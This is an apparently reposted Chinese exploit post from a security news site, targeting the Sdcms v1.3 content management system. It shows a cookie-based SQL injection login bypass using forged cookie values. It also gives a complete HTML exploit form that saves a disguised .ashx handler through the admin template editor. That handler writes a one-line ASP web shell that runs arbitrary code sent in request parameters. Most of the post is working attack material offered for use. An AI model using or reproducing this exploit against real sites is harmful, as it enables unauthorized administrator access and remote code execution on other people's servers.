首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
Sdcms v1.3 漏洞利用
来源:http://hi.baidu.com/5427518/blog/ 作者:qing 发布时间:2010-12-20  

首先在以下地址使用 livehttpheader 抓包得到 COOKIE 值:

http://192.168.248.129/admin/index.asp?Action=out

COOKIE:

1Rq4Qz6We6Dbsdcms%5Finfolever=; 1Rq4Qz6We6Dbsdcms%5Falllever=; 1Rq4Qz6We6Dbsdcms%5Fadmin=;

1Rq4Qz6We6Dbsdcms%5Fpwd=; 1Rq4Qz6We6Dbsdcms%5Fname=; 1Rq4Qz6We6Dbsdcms%5Fid=;

ASPSESSIONIDCQDBQTAD=BHPFKHJBDBOIPLOMALGOMFAA

查询语句:

Sql="select sdcms_name,sdcms_pwd from sd_admin where sdcms_name='"&sdcms_adminname&"' And

sdcms_pwd='"&sdcms_adminpwd&"'"

Sql="select sdcms_name,sdcms_pwd from sd_admin where sdcms_name='stcms' or '1'='1' or

'1'='1' And sdcms_pwd='LAONA'"

用户名可以前台得到:

stcms%27%20or%20%271%27%3D%271%27%20or%20%271%27%3D%271

使用 COOKIE EDIT 修改 COOKIE:

1Rq4Qz6We6Dbsdcms%5Fpwd=123; 1Rq4Qz6We6Dbsdcms%5Fname=stcms' or '1'='1' or

'1'='1;1Rq4Qz6We6Dbsdcms%5Fadmin=1;1Rq4Qz6We6Dbsdcms%5Fid=1;

然后进入:

http://192.168.248.129/admin/sdcms_template.asp?action=add&Path=2009

或者直接使用底下的 fuck.html。

其实就是一个COOKIE,或者进后台吧,虚拟机2003测试的。。。不行当我没发。。。

 

fuck.html 源码【Exp】:

<table width="98%" border="0" align="center" cellpadding="3" cellspacing="1">
<form name="add" id="add" method="post"

action="http://192.168.248.129/admin/sdcms_template.asp?action=save&t3=True&Path=2009"

onSubmit="return checkadd()">
<tr>
<td width="120" align="center" class="tdbg">目 录: </td>
<td class="tdbg">../Skins/2009/</td>
</tr>
<tr>
<td align="center" class="tdbg">文件名: </td>
<td class="tdbg"><input name="t0" type="text" class="input" value="0x255.ashx" id="t0"

size="40"> <span>格式:sdcms_index.htm</span></td>
</tr>
<tr class="tdbg">
<td align="center">内容:</td>
<td><textarea id="t1" name="t1" class="inputs" rows="20">GIF8A
<%@ WebHandler Language="C#" Class="Handler" %>

using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {

public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";

StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"0x255.com\"):response.End%>");
file1.Flush();
file1.Close();

}

public bool IsReusable {
get {
return false;
}
}

}

</textarea></td>
</tr>
<tr class="tdbg">
<td>&nbsp;</td>
<td><input type="submit" class="bnt" value="保存设置"> <input type="button"

onClick="history.go(-1)" class="bnt" value="放弃返回"></td>
</tr>
</form>
</table>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·shopv8的注入漏洞利用
·IIS写权限利用续以及写权限漏洞
·zblog最新漏洞及修复方法
·W78cms网站管理系统0day
·ecshop 通杀2.6*2.7 GBK版本 oda
·Phpwind远程任意代码执行漏洞
·ecshop后台写shell 0day
·v5Shop 注入 漏洞整理
·dedecms 内容管理员后台程序下载
·搜狗输入法0DAY
·最新ECshop 支付方式注射 0day
·动网8.1最新注入0Day漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved